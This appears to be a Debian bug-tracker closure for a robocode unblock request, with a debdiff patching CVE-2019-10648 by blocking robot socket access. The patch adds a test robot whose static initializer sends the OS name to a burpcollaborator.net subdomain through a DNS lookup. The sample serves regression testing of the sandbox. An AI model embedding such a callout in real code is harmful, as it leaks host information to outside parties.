Bug#926688: marked as done (unblock: robocode/1.9.3.3-2)

["Debian Bug Tracking System" <owner@bugs.debian.org>]

Your message dated Tue, 09 Apr 2019 08:37:13 +0000
with message-id <E1hDmFl-0001mU-Bz@respighi.debian.org>
and subject line unblock robocode
has caused the Debian Bug report #926688,
regarding unblock: robocode/1.9.3.3-2
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
926688: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=926688
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems

--- Begin Message ---

• To: Debian Bug Tracking System <submit@bugs.debian.org>
• Subject: unblock: robocode/1.9.3.3-2
• From: Markus Koschany <apo@debian.org>
• Date: Tue, 09 Apr 2019 01:36:00 +0200
• Message-id: <[🔎] 155476656006.5220.9796830647610411883.reportbug@spike>

Package: release.debian.org
Severity: normal
User: release.debian.org@packages.debian.org
Usertags: unblock

Please unblock package robocode

Robocode in Buster is affected by CVE-2019-10648. The fix applied
cleanly and all tests pass. This is Debian bug 926088.

Thank you.

unblock robocode/1.9.3.3-2

-- System Information:
Debian Release: buster/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: unable to detect

diff -Nru robocode-1.9.3.3/debian/changelog robocode-1.9.3.3/debian/changelog
--- robocode-1.9.3.3/debian/changelog	2018-09-13 13:52:33.000000000 +0200
+++ robocode-1.9.3.3/debian/changelog	2019-04-08 00:13:19.000000000 +0200
@@ -1,3 +1,13 @@
+robocode (1.9.3.3-2) unstable; urgency=medium
+
+  * Fix CVE-2019-10648:
+    Robocode allows remote attackers to cause external service interaction
+    (DNS), as demonstrated by a query for a unique subdomain name within an
+    attacker-controlled DNS zone, because of a .openStream call within
+    java.net.URL. (Closes: #926088)
+
+ -- Markus Koschany <apo@debian.org>  Mon, 08 Apr 2019 00:13:19 +0200
+
 robocode (1.9.3.3-1) unstable; urgency=medium
 
   * New upstream version 1.9.3.3.
diff -Nru robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch
--- robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch	1970-01-01 01:00:00.000000000 +0100
+++ robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch	2019-04-08 00:13:19.000000000 +0200
@@ -0,0 +1,235 @@
+From: Markus Koschany <apo@debian.org>
+Date: Mon, 8 Apr 2019 00:11:33 +0200
+Subject: CVE-2019-10648
+
+Bug-Debian: https://bugs.debian.org/926088
+Origin: https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd
+---
+ .../host/security/RobocodeSecurityManager.java     | 26 ++++++++++--
+ .../src/main/java/tested/robots/DnsAttack.java     | 18 +++++++++
+ .../test/robots/TestConstructorHttpAttack.java     | 11 +++---
+ .../sf/robocode/test/robots/TestHttpAttack.java    | 11 +++---
+ .../robots/TestStaticConstructorDnsAttack.java     | 46 ++++++++++++++++++++++
+ 5 files changed, 96 insertions(+), 16 deletions(-)
+ create mode 100644 robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+ create mode 100644 robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+
+diff --git a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+index bc4c85a..ebd23e9 100644
+--- a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
++++ b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread;
+ import net.sf.robocode.host.IThreadManager;
+ import net.sf.robocode.io.RobocodeProperties;
+ 
++import java.net.SocketPermission;
+ import java.security.AccessControlException;
++import java.security.Permission;
+ 
+ 
+ /**
+@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ 		}
+ 
+ 		Thread c = Thread.currentThread();
+-
+ 		if (isSafeThread(c)) {
+ 			return;
+ 		}
+@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager {
+ 			if (robotProxy != null) {
+ 				robotProxy.punishSecurityViolation(message);
+ 			}
+-			throw new AccessControlException(message);
++			throw new SecurityException(message);
+ 		}
+ 	}
+ 
+@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ 			return;
+ 		}
+ 		Thread c = Thread.currentThread();
+-
+ 		if (isSafeThread(c)) {
+ 			return;
+ 		}
+@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends SecurityManager {
+ 			String message = "Robots are only allowed to create up to 5 threads!";
+ 
+ 			robotProxy.punishSecurityViolation(message);
+-			throw new AccessControlException(message);
++			throw new SecurityException(message);
+ 		}
+ 	}
++	
++    public void checkPermission(Permission perm) {
++		if (RobocodeProperties.isSecurityOff()) {
++			return;
++		}
++		Thread c = Thread.currentThread();
++		if (isSafeThread(c)) {
++			return;
++		}
++        super.checkPermission(perm);
++
++        if (perm instanceof SocketPermission) {
++    		IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c);
++        	String message = "Using socket is not allowed";
++        	robotProxy.punishSecurityViolation(message);
++            throw new SecurityException(message);
++        }
++    }
+ 
+ 	private boolean isSafeThread(Thread c) {
+ 		return threadManager.isSafeThread(c);
+diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+new file mode 100644
+index 0000000..701e5d8
+--- /dev/null
++++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+@@ -0,0 +1,18 @@
++package tested.robots;
++
++public class DnsAttack extends robocode.Robot {
++	static {
++		try {
++			new java.net.URL("http://"; + System.getProperty("os.name").replaceAll(" ", ".")
++					+ ".randomsubdomain.burpcollaborator.net").openStream();
++		} catch (Exception e) {
++		}
++	}
++
++	public void run() {
++		for (;;) {
++			ahead(100);
++			back(100);
++		}
++	}
++}
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+index 8d7b1d7..7930237 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent;
+ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ 
+ 	private boolean messagedInitialization;
+-	private boolean messagedAccessDenied;
++	private boolean securityExceptionOccurred;
+ 	
+ 	@Override
+ 	public String getRobotNames() {
+@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ 			messagedInitialization = true;	
+ 		}	
+ 
+-		if (out.contains("access denied (java.net.SocketPermission")
+-				|| out.contains("access denied (\"java.net.SocketPermission\"")) {
+-			messagedAccessDenied = true;	
++		if (out.contains("java.lang.SecurityException:")) {
++			securityExceptionOccurred = true;	
+ 		}	
+ 	}
+ 
+ 	@Override
+ 	protected void runTeardown() {
+ 		Assert.assertTrue("Error during initialization", messagedInitialization);
+-		Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
++		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ 	}
+ 
+ 	@Override
+ 	protected int getExpectedErrors() {
+-		return hasJavaNetURLPermission ? 3 : 2; // Security error must be reported as an error
++		return 2;
+ 	}
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+index 770fb49..06d3bcb 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent;
+  */
+ public class TestHttpAttack extends RobocodeTestBed {
+ 
+-	private boolean messagedAccessDenied;
++	private boolean securityExceptionOccurred;
+ 	
+ 	@Override
+ 	public String getRobotNames() {
+@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed {
+ 
+ 		final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
+ 
+-		if (out.contains("access denied (java.net.SocketPermission")
+-				|| out.contains("access denied (\"java.net.SocketPermission\"")) {
+-			messagedAccessDenied = true;	
++		if (out.contains("java.lang.SecurityException:")) {
++			securityExceptionOccurred = true;	
+ 		}	
+ 	}
+ 
+ 	@Override
+ 	protected void runTeardown() {
+-		Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
++		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ 	}
+ 
+ 	@Override
+ 	protected int getExpectedErrors() {
+-		return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors.
++		return 1;
+ 	}
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+new file mode 100644
+index 0000000..bf62373
+--- /dev/null
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+@@ -0,0 +1,46 @@
++/**
++ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
++ * All rights reserved. This program and the accompanying materials
++ * are made available under the terms of the Eclipse Public License v1.0
++ * which accompanies this distribution, and is available at
++ * https://robocode.sourceforge.io/license/epl-v10.html
++ */
++package net.sf.robocode.test.robots;
++
++import net.sf.robocode.test.helpers.RobocodeTestBed;
++import org.junit.Assert;
++import robocode.control.events.TurnEndedEvent;
++
++/**
++ * @author Flemming N. Larsen (original)
++ */
++public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
++
++	private boolean securityExceptionOccurred;
++	
++	@Override
++	public String getRobotNames() {
++		return "tested.robots.DnsAttack,sample.Target";
++	}
++
++	@Override
++	public void onTurnEnded(TurnEndedEvent event) {
++		super.onTurnEnded(event);
++
++		final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
++
++		if (out.contains("SYSTEM: Using socket is not allowed")) {
++			securityExceptionOccurred = true;	
++		}	
++	}
++
++	@Override
++	protected void runTeardown() {
++		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
++	}
++
++	@Override
++	protected int getExpectedErrors() {
++		return 1;
++	}
++}
diff -Nru robocode-1.9.3.3/debian/patches/series robocode-1.9.3.3/debian/patches/series
--- robocode-1.9.3.3/debian/patches/series	2018-09-13 13:52:33.000000000 +0200
+++ robocode-1.9.3.3/debian/patches/series	2019-04-08 00:13:19.000000000 +0200
@@ -1,3 +1,4 @@
 showJavaDocumentation.patch
 maven-assembly.patch
 ecj.patch
+CVE-2019-10648.patch

--- End Message ---

--- Begin Message ---

• To: 926688-done@bugs.debian.org
• Subject: unblock robocode
• From: Ivo De Decker <ivodd@respighi.debian.org>
• Date: Tue, 09 Apr 2019 08:37:13 +0000
• Message-id: <E1hDmFl-0001mU-Bz@respighi.debian.org>

Unblocked robocode.

--- End Message ---